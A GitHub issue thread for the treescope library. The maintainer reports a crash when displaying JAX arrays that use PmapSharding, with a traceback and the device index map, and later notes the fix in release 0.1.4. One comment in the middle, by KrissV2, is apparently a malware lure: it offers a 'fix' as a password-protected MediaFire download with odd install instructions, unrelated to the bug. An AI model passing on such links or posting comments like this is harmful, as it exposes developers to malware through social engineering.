### ISSUE TITLE
Error when rendering JAX arrays built with `jax.device_put_replicated`

### ISSUE THREAD

**Issue by danieldjohnson** [google-deepmind/treescope#32]
`jax.device_put_replicated` creates a `PmapSharding`, which can't be rendered correctly:

```python
broken = jax.device_put_replicated(
    jnp.array([1,2,3]),
    jax.local_devices()
)
treescope.display(broken)
```
produces
```
Traceback (most recent call last):
  ...
  File "/usr/local/lib/python3.10/dist-packages/treescope/_internal/api/array_autovisualizer.py", line 193, in _autovisualize_array
    sharding_rendering = arrayviz.render_array_sharding(
  File "/usr/local/lib/python3.10/dist-packages/treescope/_internal/api/arrayviz.py", line 998, in render_array_sharding
    return render_sharding_info(
  File "/usr/local/lib/python3.10/dist-packages/treescope/_internal/api/arrayviz.py", line 785, in render_sharding_info
    assert slc.step is None
AttributeError: 'int' object has no attribute 'step'
```
This appears to be because the PmapSharding uses integers instead of length-1 slices to describe the sharding:
```
>>> broken.sharding.devices_indices_map(arr.shape)
{
TpuDevice(id=0, process_index=0, coords=(0,0,0), core_on_chip=0): (0, slice(None, None, None)),
TpuDevice(id=1, process_index=0, coords=(0,0,0), core_on_chip=1): (1, slice(None, None, None)),
TpuDevice(id=2, process_index=0, coords=(1,0,0), core_on_chip=0):  (2, slice(None, None, None)),
TpuDevice(id=3, process_index=0, coords=(1,0,0), core_on_chip=1): (3, slice(None, None, None)),
TpuDevice(id=4, process_index=0, coords=(0,1,0), core_on_chip=0): (4, slice(None, None, None)),
TpuDevice(id=5, process_index=0, coords=(0,1,0), core_on_chip=1): (5, slice(None, None, None)),
TpuDevice(id=6, process_index=0, coords=(1,1,0), core_on_chip=0): (6, slice(None, None, None)),
TpuDevice(id=7, process_index=0, coords=(1,1,0), core_on_chip=1): (7, slice(None, None, None)),
}
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by danieldjohnson** [comment]
Fixed in release 0.1.4.
